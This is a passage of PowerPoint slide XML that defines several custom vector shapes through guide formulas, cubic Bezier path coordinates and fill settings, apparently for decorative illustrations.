                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116408" y="345028"/>
                      <a:pt x="110122" y="367315"/>
                      <a:pt x="96978" y="387316"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87264" y="402174"/>
                      <a:pt x="75834" y="413603"/>
                      <a:pt x="56977" y="410745"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38118" y="408460"/>
                      <a:pt x="24404" y="374173"/>
                      <a:pt x="18118" y="373601"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="-7598" y="346743"/>
                      <a:pt x="-740" y="315313"/>
                      <a:pt x="7260" y="286169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28404" y="210736"/>
                      <a:pt x="72977" y="149019"/>
                      <a:pt x="122122" y="90160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128408" y="82159"/>
                      <a:pt x="138123" y="75302"/>
                      <a:pt x="147838" y="71873"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="164125" y="66730"/>
                      <a:pt x="173982" y="58587"/>
                      <a:pt x="179482" y="47944"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="436121" y="9766"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="609586" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="609751" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609586" y="0"/>
                    </a:ln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D2899C9-8405-45B5-9710-F1292A2F213A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10350957" y="4165378"/>
                <a:ext cx="723606" cy="1487139"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 300151 w 737155"/>
                  <a:gd name="connsiteY0" fmla="*/ 966960 h 1514985"/>
                  <a:gd name="connsiteX1" fmla="*/ 419585 w 737155"/>
                  <a:gd name="connsiteY1" fmla="*/ 780095 h 1514985"/>
                  <a:gd name="connsiteX2" fmla="*/ 424156 w 737155"/>
                  <a:gd name="connsiteY2" fmla="*/ 760094 h 1514985"/>
                  <a:gd name="connsiteX3" fmla="*/ 276149 w 737155"/>
                  <a:gd name="connsiteY3" fmla="*/ 687519 h 1514985"/>
                  <a:gd name="connsiteX4" fmla="*/ 253291 w 737155"/>
                  <a:gd name="connsiteY4" fmla="*/ 682948 h 1514985"/>
                  <a:gd name="connsiteX5" fmla="*/ 233290 w 737155"/>
                  <a:gd name="connsiteY5" fmla="*/ 651518 h 1514985"/>
                  <a:gd name="connsiteX6" fmla="*/ 231576 w 737155"/>
                  <a:gd name="connsiteY6" fmla="*/ 627516 h 1514985"/>
                  <a:gd name="connsiteX7" fmla="*/ 205289 w 737155"/>
                  <a:gd name="connsiteY7" fmla="*/ 620088 h 1514985"/>
                  <a:gd name="connsiteX8" fmla="*/ 164716 w 737155"/>
                  <a:gd name="connsiteY8" fmla="*/ 670947 h 1514985"/>
                  <a:gd name="connsiteX9" fmla="*/ 117285 w 737155"/>
                  <a:gd name="connsiteY9" fmla="*/ 926387 h 1514985"/>
                  <a:gd name="connsiteX10" fmla="*/ 61283 w 737155"/>
                  <a:gd name="connsiteY10" fmla="*/ 1217829 h 1514985"/>
                  <a:gd name="connsiteX11" fmla="*/ 30996 w 737155"/>
                  <a:gd name="connsiteY11" fmla="*/ 1514985 h 1514985"/>
                  <a:gd name="connsiteX12" fmla="*/ 25281 w 737155"/>
                  <a:gd name="connsiteY12" fmla="*/ 1468697 h 1514985"/>
                  <a:gd name="connsiteX13" fmla="*/ 30424 w 737155"/>
                  <a:gd name="connsiteY13" fmla="*/ 1346406 h 1514985"/>
                  <a:gd name="connsiteX14" fmla="*/ 14995 w 737155"/>
                  <a:gd name="connsiteY14" fmla="*/ 1180113 h 1514985"/>
                  <a:gd name="connsiteX15" fmla="*/ 17852 w 737155"/>
                  <a:gd name="connsiteY15" fmla="*/ 1001248 h 1514985"/>
                  <a:gd name="connsiteX16" fmla="*/ 107570 w 737155"/>
                  <a:gd name="connsiteY16" fmla="*/ 772094 h 1514985"/>
                  <a:gd name="connsiteX17" fmla="*/ 133858 w 737155"/>
                  <a:gd name="connsiteY17" fmla="*/ 481224 h 1514985"/>
                  <a:gd name="connsiteX18" fmla="*/ 228719 w 737155"/>
                  <a:gd name="connsiteY18" fmla="*/ 593229 h 1514985"/>
                  <a:gd name="connsiteX19" fmla="*/ 261863 w 737155"/>
                  <a:gd name="connsiteY19" fmla="*/ 596658 h 1514985"/>
                  <a:gd name="connsiteX20" fmla="*/ 464158 w 737155"/>
                  <a:gd name="connsiteY20" fmla="*/ 356647 h 1514985"/>
                  <a:gd name="connsiteX21" fmla="*/ 544733 w 737155"/>
                  <a:gd name="connsiteY21" fmla="*/ 274929 h 1514985"/>
                  <a:gd name="connsiteX22" fmla="*/ 705883 w 737155"/>
                  <a:gd name="connsiteY22" fmla="*/ 60634 h 1514985"/>
                  <a:gd name="connsiteX23" fmla="*/ 713312 w 737155"/>
                  <a:gd name="connsiteY23" fmla="*/ 60 h 1514985"/>
                  <a:gd name="connsiteX24" fmla="*/ 733313 w 737155"/>
                  <a:gd name="connsiteY24" fmla="*/ 34347 h 1514985"/>
                  <a:gd name="connsiteX25" fmla="*/ 638452 w 737155"/>
                  <a:gd name="connsiteY25" fmla="*/ 264072 h 1514985"/>
                  <a:gd name="connsiteX26" fmla="*/ 276721 w 737155"/>
                  <a:gd name="connsiteY26" fmla="*/ 1244687 h 1514985"/>
                  <a:gd name="connsiteX27" fmla="*/ 282436 w 737155"/>
                  <a:gd name="connsiteY27" fmla="*/ 1140683 h 1514985"/>
                  <a:gd name="connsiteX28" fmla="*/ 301294 w 737155"/>
                  <a:gd name="connsiteY28" fmla="*/ 1050393 h 1514985"/>
                  <a:gd name="connsiteX29" fmla="*/ 300151 w 737155"/>
                  <a:gd name="connsiteY29" fmla="*/ 966960 h 1514985"/>
                  <a:gd name="connsiteX30" fmla="*/ 300151 w 737155"/>
                  <a:gd name="connsiteY30" fmla="*/ 966960 h 151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7155" h="1514985">
                    <a:moveTo>
                      <a:pt x="300151" y="966960"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="328152" y="897243"/>
                      <a:pt x="353296" y="825240"/>
                      <a:pt x="419585" y="780095"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="426442" y="775523"/>
                      <a:pt x="440728" y="768094"/>
                      <a:pt x="424156" y="760094"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="374440" y="736093"/>
                      <a:pt x="328152" y="706377"/>
                      <a:pt x="276149" y="687519"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="269292" y="684662"/>
                      <a:pt x="261292" y="682948"/>
                      <a:pt x="253291" y="682948"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="227576" y="683519"/>
                      <a:pt x="215004" y="677804"/>
                      <a:pt x="233290" y="651518"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="238434" y="644089"/>
                      <a:pt x="239005" y="634945"/>
                      <a:pt x="231576" y="627516"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="224719" y="620659"/>
                      <a:pt x="215575" y="617230"/>
                      <a:pt x="205289" y="620088"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179002" y="626945"/>
                      <a:pt x="168716" y="646375"/>
                      <a:pt x="164716" y="670947"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="148715" y="756094"/>
                      <a:pt x="116142" y="838954"/>
                      <a:pt x="117285" y="926387"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118428" y="1028106"/>
                      <a:pt x="81284" y="1121253"/>
                      <a:pt x="61283" y="1217829"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41282" y="1315548"/>
                      <a:pt x="34996" y="1414981"/>
                      <a:pt x="30996" y="1514985"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16138" y="1501270"/>
                      <a:pt x="25281" y="1484127"/>
                      <a:pt x="25281" y="1468697"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26424" y="1428124"/>
                      <a:pt x="26424" y="1387551"/>
                      <a:pt x="30424" y="1346406"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35567" y="1290403"/>
                      <a:pt x="35567" y="1234401"/>
                      <a:pt x="14995" y="1180113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="-7863" y="1120110"/>
                      <a:pt x="-2720" y="1060679"/>
                      <a:pt x="17852" y="1001248"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44139" y="923530"/>
                      <a:pt x="74997" y="846955"/>
                      <a:pt x="107570" y="772094"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="147001" y="681805"/>
                      <a:pt x="153858" y="581229"/>
                      <a:pt x="133858" y="481224"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159001" y="515511"/>
                      <a:pt x="204146" y="558371"/>
                      <a:pt x="228719" y="593229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="239577" y="608087"/>
                      <a:pt x="247577" y="618373"/>
                      <a:pt x="261863" y="596658"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="319580" y="508654"/>
                      <a:pt x="393869" y="434365"/>
                      <a:pt x="464158" y="356647"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="497302" y="335503"/>
                      <a:pt x="521303" y="304073"/>
                      <a:pt x="544733" y="274929"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="600735" y="206926"/>
                      <a:pt x="656167" y="133208"/>
                      <a:pt x="705883" y="60634"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="722455" y="36633"/>
                      <a:pt x="716741" y="22918"/>
                      <a:pt x="713312" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="741313" y="-1083"/>
                      <a:pt x="739599" y="14346"/>
                      <a:pt x="733313" y="34347"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="705883" y="112636"/>
                      <a:pt x="669310" y="187497"/>
                      <a:pt x="638452" y="264072"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="511017" y="576657"/>
                      <a:pt x="276721" y="1241258"/>
                      <a:pt x="276721" y="1244687"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="279007" y="1200685"/>
                      <a:pt x="277292" y="1161255"/>
                      <a:pt x="282436" y="1140683"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="289864" y="1110967"/>
                      <a:pt x="295579" y="1080680"/>
                      <a:pt x="301294" y="1050393"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="305865" y="1021249"/>
                      <a:pt x="308722" y="993819"/>
                      <a:pt x="300151" y="966960"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="300151" y="96696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5772CF9-C651-4A48-9EEF-1544FDF590F1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10372408" y="4765099"/>
                <a:ext cx="405256" cy="1554211"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 233725 w 412844"/>
                  <a:gd name="connsiteY0" fmla="*/ 725742 h 1583313"/>
                  <a:gd name="connsiteX1" fmla="*/ 186294 w 412844"/>
                  <a:gd name="connsiteY1" fmla="*/ 1021755 h 1583313"/>
                  <a:gd name="connsiteX2" fmla="*/ 161150 w 412844"/>
                  <a:gd name="connsiteY2" fmla="*/ 1522921 h 1583313"/>
                  <a:gd name="connsiteX3" fmla="*/ 127434 w 412844"/>
                  <a:gd name="connsiteY3" fmla="*/ 1579495 h 1583313"/>
                  <a:gd name="connsiteX4" fmla="*/ 64003 w 412844"/>
                  <a:gd name="connsiteY4" fmla="*/ 1550922 h 1583313"/>
                  <a:gd name="connsiteX5" fmla="*/ 0 w 412844"/>
                  <a:gd name="connsiteY5" fmla="*/ 907464 h 1583313"/>
                  <a:gd name="connsiteX6" fmla="*/ 53145 w 412844"/>
                  <a:gd name="connsiteY6" fmla="*/ 500017 h 1583313"/>
                  <a:gd name="connsiteX7" fmla="*/ 84575 w 412844"/>
                  <a:gd name="connsiteY7" fmla="*/ 290865 h 1583313"/>
                  <a:gd name="connsiteX8" fmla="*/ 120577 w 412844"/>
                  <a:gd name="connsiteY8" fmla="*/ 111428 h 1583313"/>
                  <a:gd name="connsiteX9" fmla="*/ 132006 w 412844"/>
                  <a:gd name="connsiteY9" fmla="*/ 51426 h 1583313"/>
                  <a:gd name="connsiteX10" fmla="*/ 163436 w 412844"/>
                  <a:gd name="connsiteY10" fmla="*/ 7424 h 1583313"/>
                  <a:gd name="connsiteX11" fmla="*/ 217153 w 412844"/>
                  <a:gd name="connsiteY11" fmla="*/ 36568 h 1583313"/>
                  <a:gd name="connsiteX12" fmla="*/ 238297 w 412844"/>
                  <a:gd name="connsiteY12" fmla="*/ 63426 h 1583313"/>
                  <a:gd name="connsiteX13" fmla="*/ 397161 w 412844"/>
                  <a:gd name="connsiteY13" fmla="*/ 136572 h 1583313"/>
                  <a:gd name="connsiteX14" fmla="*/ 404590 w 412844"/>
                  <a:gd name="connsiteY14" fmla="*/ 171431 h 1583313"/>
                  <a:gd name="connsiteX15" fmla="*/ 281727 w 412844"/>
                  <a:gd name="connsiteY15" fmla="*/ 356582 h 1583313"/>
                  <a:gd name="connsiteX16" fmla="*/ 233725 w 412844"/>
                  <a:gd name="connsiteY16" fmla="*/ 725742 h 1583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2844" h="1583313">
                    <a:moveTo>
                      <a:pt x="233725" y="725742"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="202866" y="821175"/>
                      <a:pt x="197723" y="922322"/>
                      <a:pt x="186294" y="1021755"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168579" y="1178334"/>
                      <a:pt x="159436" y="1512634"/>
                      <a:pt x="161150" y="1522921"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="166865" y="1556636"/>
                      <a:pt x="160007" y="1568637"/>
                      <a:pt x="127434" y="1579495"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97147" y="1589209"/>
                      <a:pt x="76575" y="1580638"/>
                      <a:pt x="64003" y="1550922"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47431" y="1512634"/>
                      <a:pt x="0" y="1093187"/>
                      <a:pt x="0" y="907464"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="769744"/>
                      <a:pt x="8572" y="632595"/>
                      <a:pt x="53145" y="500017"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76003" y="432586"/>
                      <a:pt x="78861" y="361726"/>
                      <a:pt x="84575" y="290865"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89147" y="230291"/>
                      <a:pt x="97147" y="169145"/>
                      <a:pt x="120577" y="111428"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="128006" y="92570"/>
                      <a:pt x="126292" y="71427"/>
                      <a:pt x="132006" y="51426"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137721" y="32568"/>
                      <a:pt x="146293" y="17138"/>
                      <a:pt x="163436" y="7424"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="191437" y="-9720"/>
                      <a:pt x="218296" y="3995"/>
                      <a:pt x="217153" y="36568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="216581" y="54283"/>
                      <a:pt x="221724" y="59998"/>
                      <a:pt x="238297" y="63426"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="296013" y="76570"/>
                      <a:pt x="345159" y="109714"/>
                      <a:pt x="397161" y="136572"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="412590" y="144573"/>
                      <a:pt x="419448" y="160002"/>
                      <a:pt x="404590" y="171431"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="341730" y="219433"/>
                      <a:pt x="316014" y="290294"/>
                      <a:pt x="281727" y="356582"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="253726" y="409156"/>
                      <a:pt x="289156" y="552020"/>
                      <a:pt x="233725" y="7257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BA0938A-8839-42BE-B45D-7A49FD29F416}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="10485118" y="4877159"/>
                <a:ext cx="179183" cy="976178"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 160049 w 182538"/>
                  <a:gd name="connsiteY0" fmla="*/ 241852 h 994457"/>
                  <a:gd name="connsiteX1" fmla="*/ 176049 w 182538"/>
                  <a:gd name="connsiteY1" fmla="*/ 281283 h 994457"/>
                  <a:gd name="connsiteX2" fmla="*/ 64616 w 182538"/>
                  <a:gd name="connsiteY2" fmla="*/ 756161 h 994457"/>
                  <a:gd name="connsiteX3" fmla="*/ 18328 w 182538"/>
                  <a:gd name="connsiteY3" fmla="*/ 994458 h 994457"/>
                  <a:gd name="connsiteX4" fmla="*/ 41 w 182538"/>
                  <a:gd name="connsiteY4" fmla="*/ 499007 h 994457"/>
                  <a:gd name="connsiteX5" fmla="*/ 28042 w 182538"/>
                  <a:gd name="connsiteY5" fmla="*/ 216708 h 994457"/>
                  <a:gd name="connsiteX6" fmla="*/ 129761 w 182538"/>
                  <a:gd name="connsiteY6" fmla="*/ 12699 h 994457"/>
                  <a:gd name="connsiteX7" fmla="*/ 165763 w 182538"/>
                  <a:gd name="connsiteY7" fmla="*/ 2413 h 994457"/>
                  <a:gd name="connsiteX8" fmla="*/ 182335 w 182538"/>
                  <a:gd name="connsiteY8" fmla="*/ 32700 h 994457"/>
                  <a:gd name="connsiteX9" fmla="*/ 149191 w 182538"/>
                  <a:gd name="connsiteY9" fmla="*/ 124704 h 994457"/>
                  <a:gd name="connsiteX10" fmla="*/ 120047 w 182538"/>
                  <a:gd name="connsiteY10" fmla="*/ 181278 h 994457"/>
                  <a:gd name="connsiteX11" fmla="*/ 114332 w 182538"/>
                  <a:gd name="connsiteY11" fmla="*/ 197279 h 994457"/>
                  <a:gd name="connsiteX12" fmla="*/ 85760 w 182538"/>
                  <a:gd name="connsiteY12" fmla="*/ 243567 h 994457"/>
                  <a:gd name="connsiteX13" fmla="*/ 77188 w 182538"/>
                  <a:gd name="connsiteY13" fmla="*/ 256139 h 994457"/>
                  <a:gd name="connsiteX14" fmla="*/ 160049 w 182538"/>
                  <a:gd name="connsiteY14" fmla="*/ 241852 h 994457"/>
                  <a:gd name="connsiteX15" fmla="*/ 160049 w 182538"/>
                  <a:gd name="connsiteY15" fmla="*/ 241852 h 99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2538" h="994457">
                    <a:moveTo>
                      <a:pt x="160049" y="241852"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="176621" y="250424"/>
                      <a:pt x="180050" y="266425"/>
                      <a:pt x="176049" y="281283"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160620" y="341857"/>
                      <a:pt x="108046" y="563581"/>
                      <a:pt x="64616" y="756161"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36043" y="883024"/>
                      <a:pt x="21757" y="992743"/>
                      <a:pt x="18328" y="994458"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9756" y="936741"/>
                      <a:pt x="613" y="607012"/>
                      <a:pt x="41" y="499007"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="-530" y="403574"/>
                      <a:pt x="4613" y="309284"/>
                      <a:pt x="28042" y="216708"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46900" y="141276"/>
                      <a:pt x="90331" y="77845"/>
                      <a:pt x="129761" y="12699"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137762" y="-1016"/>
                      <a:pt x="152619" y="-2159"/>
                      <a:pt x="165763" y="2413"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="180050" y="6984"/>
                      <a:pt x="183478" y="18985"/>
                      <a:pt x="182335" y="32700"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="180621" y="66987"/>
                      <a:pt x="164049" y="95560"/>
                      <a:pt x="149191" y="124704"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139476" y="143562"/>
                      <a:pt x="129190" y="162420"/>
                      <a:pt x="120047" y="181278"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117190" y="186421"/>
                      <a:pt x="112618" y="194421"/>
                      <a:pt x="114332" y="197279"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137762" y="234423"/>
                      <a:pt x="98903" y="230423"/>
                      <a:pt x="85760" y="243567"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82902" y="246995"/>
                      <a:pt x="76616" y="246995"/>
                      <a:pt x="77188" y="256139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105760" y="254996"/>
                      <a:pt x="133190" y="252138"/>
                      <a:pt x="160049" y="241852"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="160049" y="241852"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent1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ABD5F32-41CE-4BD0-8205-E19429837AB1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8711679" y="5673542"/>
                <a:ext cx="918047" cy="398294"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 386561 w 935237"/>
                  <a:gd name="connsiteY0" fmla="*/ 199 h 405752"/>
                  <a:gd name="connsiteX1" fmla="*/ 423768 w 935237"/>
                  <a:gd name="connsiteY1" fmla="*/ 7155 h 405752"/>
                  <a:gd name="connsiteX2" fmla="*/ 660921 w 935237"/>
                  <a:gd name="connsiteY2" fmla="*/ 77444 h 405752"/>
                  <a:gd name="connsiteX3" fmla="*/ 808357 w 935237"/>
                  <a:gd name="connsiteY3" fmla="*/ 80872 h 405752"/>
                  <a:gd name="connsiteX4" fmla="*/ 924933 w 935237"/>
                  <a:gd name="connsiteY4" fmla="*/ 150018 h 405752"/>
                  <a:gd name="connsiteX5" fmla="*/ 924933 w 935237"/>
                  <a:gd name="connsiteY5" fmla="*/ 263166 h 405752"/>
                  <a:gd name="connsiteX6" fmla="*/ 828358 w 935237"/>
                  <a:gd name="connsiteY6" fmla="*/ 368314 h 405752"/>
                  <a:gd name="connsiteX7" fmla="*/ 690066 w 935237"/>
                  <a:gd name="connsiteY7" fmla="*/ 386600 h 405752"/>
                  <a:gd name="connsiteX8" fmla="*/ 596919 w 935237"/>
                  <a:gd name="connsiteY8" fmla="*/ 382029 h 405752"/>
                  <a:gd name="connsiteX9" fmla="*/ 512343 w 935237"/>
                  <a:gd name="connsiteY9" fmla="*/ 372885 h 405752"/>
                  <a:gd name="connsiteX10" fmla="*/ 483592 w 935237"/>
                  <a:gd name="connsiteY10" fmla="*/ 376332 h 405752"/>
                  <a:gd name="connsiteX11" fmla="*/ 468581 w 935237"/>
                  <a:gd name="connsiteY11" fmla="*/ 375712 h 405752"/>
                  <a:gd name="connsiteX12" fmla="*/ 428925 w 935237"/>
                  <a:gd name="connsiteY12" fmla="*/ 366158 h 405752"/>
                  <a:gd name="connsiteX13" fmla="*/ 405481 w 935237"/>
                  <a:gd name="connsiteY13" fmla="*/ 346598 h 405752"/>
                  <a:gd name="connsiteX14" fmla="*/ 394052 w 935237"/>
                  <a:gd name="connsiteY14" fmla="*/ 279738 h 405752"/>
                  <a:gd name="connsiteX15" fmla="*/ 402624 w 935237"/>
                  <a:gd name="connsiteY15" fmla="*/ 269452 h 405752"/>
                  <a:gd name="connsiteX16" fmla="*/ 366051 w 935237"/>
                  <a:gd name="connsiteY16" fmla="*/ 263166 h 405752"/>
                  <a:gd name="connsiteX17" fmla="*/ 273475 w 935237"/>
                  <a:gd name="connsiteY17" fmla="*/ 347741 h 405752"/>
                  <a:gd name="connsiteX18" fmla="*/ 263832 w 935237"/>
                  <a:gd name="connsiteY18" fmla="*/ 360671 h 405752"/>
                  <a:gd name="connsiteX19" fmla="*/ 255459 w 935237"/>
                  <a:gd name="connsiteY19" fmla="*/ 375924 h 405752"/>
                  <a:gd name="connsiteX20" fmla="*/ 0 w 935237"/>
                  <a:gd name="connsiteY20" fmla="*/ 405752 h 405752"/>
                  <a:gd name="connsiteX21" fmla="*/ 4320 w 935237"/>
                  <a:gd name="connsiteY21" fmla="*/ 375171 h 405752"/>
                  <a:gd name="connsiteX22" fmla="*/ 4892 w 935237"/>
                  <a:gd name="connsiteY22" fmla="*/ 314597 h 405752"/>
                  <a:gd name="connsiteX23" fmla="*/ 35750 w 935237"/>
                  <a:gd name="connsiteY23" fmla="*/ 204306 h 405752"/>
                  <a:gd name="connsiteX24" fmla="*/ 91753 w 935237"/>
                  <a:gd name="connsiteY24" fmla="*/ 115731 h 405752"/>
                  <a:gd name="connsiteX25" fmla="*/ 160899 w 935237"/>
                  <a:gd name="connsiteY25" fmla="*/ 82586 h 405752"/>
                  <a:gd name="connsiteX26" fmla="*/ 284904 w 935237"/>
                  <a:gd name="connsiteY26" fmla="*/ 24870 h 405752"/>
                  <a:gd name="connsiteX27" fmla="*/ 386561 w 935237"/>
                  <a:gd name="connsiteY27" fmla="*/ 199 h 4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35237" h="405752">
                    <a:moveTo>
                      <a:pt x="386561" y="199"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="398553" y="833"/>
                      <a:pt x="410910" y="3012"/>
                      <a:pt x="423768" y="7155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="502057" y="32870"/>
                      <a:pt x="578632" y="63729"/>
                      <a:pt x="660921" y="77444"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="696923" y="83729"/>
                      <a:pt x="795213" y="81443"/>
                      <a:pt x="808357" y="80872"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="868359" y="71729"/>
                      <a:pt x="906075" y="94016"/>
                      <a:pt x="924933" y="150018"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="937505" y="187734"/>
                      <a:pt x="939791" y="225450"/>
                      <a:pt x="924933" y="263166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="920362" y="274024"/>
                      <a:pt x="835786" y="369457"/>
                      <a:pt x="828358" y="368314"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="790642" y="363171"/>
                      <a:pt x="726067" y="371171"/>
                      <a:pt x="690066" y="386600"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="659778" y="399172"/>
                      <a:pt x="627206" y="395743"/>
                      <a:pt x="596919" y="382029"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="569489" y="369457"/>
                      <a:pt x="542059" y="367742"/>
                      <a:pt x="512343" y="372885"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="502771" y="374457"/>
                      <a:pt x="493128" y="375778"/>
                      <a:pt x="483592" y="376332"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="468581" y="375712"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="428925" y="366158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405481" y="346598"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="385480" y="327169"/>
                      <a:pt x="389480" y="303168"/>
                      <a:pt x="394052" y="279738"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="395195" y="274595"/>
                      <a:pt x="398052" y="270595"/>
                      <a:pt x="402624" y="269452"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="395195" y="252308"/>
                      <a:pt x="382052" y="254023"/>
                      <a:pt x="366051" y="263166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="328906" y="284310"/>
                      <a:pt x="294048" y="308311"/>
                      <a:pt x="273475" y="347741"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
